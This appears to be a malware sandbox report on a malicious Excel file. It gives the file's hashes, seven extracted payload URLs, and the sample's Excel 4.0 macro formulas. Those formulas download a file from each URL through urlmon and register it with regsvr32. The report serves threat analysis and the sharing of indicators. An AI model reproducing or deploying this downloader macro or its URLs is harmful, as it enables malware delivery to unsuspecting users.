General
-
Target
27cf0a5c0a517f9e8a30df1569695027c02d724c64ab18a309eab3fc9c4519ae
-
Size
35KB
-
MD5
24c16b92b79730f6196f38c7b2faddb5
-
SHA1
d455f6781bab4ff5d1a3f83a1e5a82e1c05de954
-
SHA256
27cf0a5c0a517f9e8a30df1569695027c02d724c64ab18a309eab3fc9c4519ae
-
SHA512
bdfaefed240bb9fabd5f86262b9aa9bc03394d6c53688518137d8abd77c54afa8c32f3bf7280d5f2648f4130718e78cf5ade3ec29e7b29d4b111c3fe2c24f8d5
-
SSDEEP
768:iFtT5eBvAjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooo0+6:StTghUOZZ1ZYpoQ/pMAz
Malware Config
Extracted
https://freebingpops.com/cgi-bin/DmVp7VBVEpHssN/
https://www.kinfri.com/licenses/3fKSJkZXZ3JH6dXWU/
https://globaltextiles.net/cgi-bin/7naWzYGRrrN/
https://cartoriogasparin.com.br/rosesq/gOfN6jvyRme/
https://junhe.media/wp-includes/VV2NZX242BnWCtYmV9N/
https://ibpcorp.org/wp-admin/zH1k6hEcWGHLDp/
https://ihmsswiss.ch/wp-admin/gUOq0e/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://freebingpops.com/cgi-bin/DmVp7VBVEpHssN/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.kinfri.com/licenses/3fKSJkZXZ3JH6dXWU/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://globaltextiles.net/cgi-bin/7naWzYGRrrN/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://cartoriogasparin.com.br/rosesq/gOfN6jvyRme/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://junhe.media/wp-includes/VV2NZX242BnWCtYmV9N/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ibpcorp.org/wp-admin/zH1k6hEcWGHLDp/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ihmsswiss.ch/wp-admin/gUOq0e/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
27cf0a5c0a517f9e8a30df1569695027c02d724c64ab18a309eab3fc9c4519ae